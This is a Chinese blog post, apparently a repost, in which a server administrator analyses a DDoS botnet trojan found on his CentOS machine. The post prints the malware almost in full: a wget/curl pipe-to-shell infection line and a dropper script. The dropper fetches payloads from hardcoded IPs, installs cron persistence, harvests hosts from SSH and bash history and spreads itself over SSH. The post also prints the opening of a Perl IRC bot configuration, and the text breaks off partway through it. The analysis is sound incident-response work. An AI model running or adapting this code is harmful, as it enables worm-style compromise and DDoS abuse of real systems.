DDOS肉鸡代码

最新推荐文章于 2021-05-02 09:46:40 发布

weixin_34021089

最新推荐文章于 2021-05-02 09:46:40 发布

阅读量1.5k

点赞数 2

文章标签： shell 操作系统网络

原文链接：https://my.oschina.net/yaray/blog/881221

版权

为什么80%的码农都做不了架构师？>>>

最近一段时间，所使用的CentOS服务器被不明人士安放了木马程序；观察发现该木马程序是用来发起DDOS攻击的肉鸡程序，在发作时占用绝大部分的网络带宽。

起点：

wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*

执行完上面的代码以后，你的机器就已经中招了。以下是所下载和执行的代码：

plm=`ps x |grep httpd.conf|grep -v grep`
plt=`cat /proc/cpuinfo|grep aes`
#pgrep perl |sed '1d;' |xargs kill -9
if [ "$plm" != "" ]
  then
    echo
else

    rm -rf  apache* httpd.conf* /usr/local/bin/sysmonitord
    echo 'nameserver 8.8.8.8'> /etc/resolv.conf
    #/sbin/iptables -A OUTPUT -p tcp --dport 45560 -j ACCEPT
    kill -9 `ps x|grep stratum|awk '{print $1}'`
    kill -9 `ps x|grep httpd.conf|grep -v grep|awk '{print $1}'`
    #killall -9 sysmonitord sh wget curl
    crontab -r

    if [ -f libcurl.so.4 ] ; then
        echo
    else
        wget           223.255.145.158/libcrypto.so.6 > /dev/null 2>&1
        wget           223.255.145.158/libcurl.so.4 > /dev/null 2>&1
        wget           223.255.145.158/libssl.so.6 > /dev/null 2>&1
        wget           223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1
        wget           223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1

        curl -O http://223.255.145.158/libcrypto.so.6 > /dev/null 2>&1
        curl -O http://223.255.145.158/libssl.so.6 > /dev/null 2>&1
        curl -O http://223.255.145.158/libcurl.so.4 > /dev/null 2>&1
        curl -O http://223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1
        curl -O http://223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1
        export LD_LIBRARY_PATH=`pwd`
    fi

    curl -O    http://65.254.63.20/apache > /dev/null 2>&1
    wget -qO - http://65.254.63.20/.mail | perl
    curl -O    http://65.254.63.20/.mail  > /dev/null 2>&1
    fetch      http://65.254.63.20/.mail > /dev/null 2>&1 ; perl .mail ; rm -rf .mail* 
    wget       http://65.254.63.20/apache > /dev/null 2>&1
    wget       http://65.254.63.20/httpd.conf > /dev/null 2>&1
    curl -O    http://65.254.63.20/httpd.conf > /dev/null 2>&1

    if [ -f /etc/cron.daily/anacron ] ; then
        echo
    else
        wget -O /etc/cron.daily/anacron http://65.254.63.20/a > /dev/null 2>&1 ; chmod +x /etc/cron.daily/anacron
        curl -O http://65.254.63.20/a  > /dev/null 2>&1; mv a /etc/cron.daily/anacron ; chmod +x /etc/cron.daily/anacron
    fi

    chmod +x apache
    (exec ./apache -c httpd.conf &> /dev/null &)
    sleep 2

    rm -rf wget* apache* httpd*
fi

if [ "$plm" != "" ]
  then
    echo
  else

    if [ "$plt" != "" ]
      then
        echo
      else
        wget    http://65.254.63.20/apacheaes > /dev/null 2>&1
        curl -O http://65.254.63.20/apacheaes > /dev/null 2>&1
        wget    http://65.254.63.20/httpd.conf > /dev/null 2>&1
        curl -O http://65.254.63.20/httpd.conf > /dev/null 2>&1
        chmod +x apacheaes
        mv apacheaes apache2
        (exec ./apache2 -c httpd.conf &> /dev/null &)
    fi

fi

if [ -f /tmp/.h ] ; then
    echo
else
cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h > /dev/null 2>&1
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1
for i in `cat /tmp/.h` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*") > /dev/null 2>&1 ; done
fi

history -rc

以上shell脚本代码主要是下载并执行相关代码，以启动相应功能的服务进程；然后分析相应的日志/历史文件，从中解析出相关IP地址，并尝试登录到相应IP地址并再次执行上述动作（即：下载并执行上述shell脚本，以达到感染其他机器的目的）。

上面的 wget http://65.254.63.20/.mail | perl 所下载并执行的perl代码：

#!/usr/bin/perl
my @mast3rs = ("G");

my @hostauth = ("localhost");
my @admchan=("#x");

my @server = ("213.152.3.19");
$servidor= $server[rand scalar @server] unless $servidor;

my $xeqt = "!say";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

my @fakeps = ("/usr/bin/httpd");

my @nickname = ("V");

my @xident = ("xxx");
my @xname = (`uname -a`);

#################
# Random Ports
#################
my @rports = ("8080");

my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
   "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
   "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
   "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
   "\001Snak for Macintosh 4.9.8 English\001",
   "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
   "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
   "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
   "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
   "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
   "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
   "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
   "\001ircN 8.00 ^_-^_ he tries to tell me what I put inside of me ^_-^_\001",
   "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
   "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
   "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
   "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
   "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
   "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1??9] : Keep it to yourself!\001",
   "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
   "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
   "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10